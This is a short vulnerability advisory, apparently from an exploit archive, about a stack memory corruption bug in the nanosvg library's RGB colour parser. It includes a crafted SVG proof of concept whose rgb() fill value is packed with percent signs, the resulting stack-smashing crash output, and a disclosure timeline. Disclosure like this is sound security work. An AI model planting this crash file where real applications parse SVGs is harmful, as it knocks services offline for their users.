SVG nanosvg Library Memory Corruption / Denial Of Service

The SVG nanosvg library suffers from a denial of service vulnerability due to a memory corruption bug.

MD5 | a92b210d4f5bd9069939f2dfef6879aa

The SVG library nanosvg [0] suffers from a memory corruption bug that can lead to at least DoS. 

The bug exists in the `nsvg__parseColorRGB` function, which can be reached by parsing a malicious SVG file through `nsvgParseFromFile` or `nsvgParse`. This should also affect libraries/packages that provide bindings to nanosvg, for example:

- Lua:
- Python:
- Java:
- Rust:

More information available in the issue [1] and the blogpost [2].

# PoC

> <svg>
> <circle fill="rgb(0%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%)"/>
> </svg>

> $> ./test poc.svg
> *** stack smashing detected ***: <unknown> terminated
> fish: a./test poc.svga terminated by signal SIGABRT (Abort)

# Timeline
- Late 2018 bug discovered by Sebastian Neef using AFL
- 16th Nov 2018 opened issue [1]
- 19th Feb 2019 CVE assigned by DWF
- 24th Feb 2019 blogpost [2] and email published


Related Posts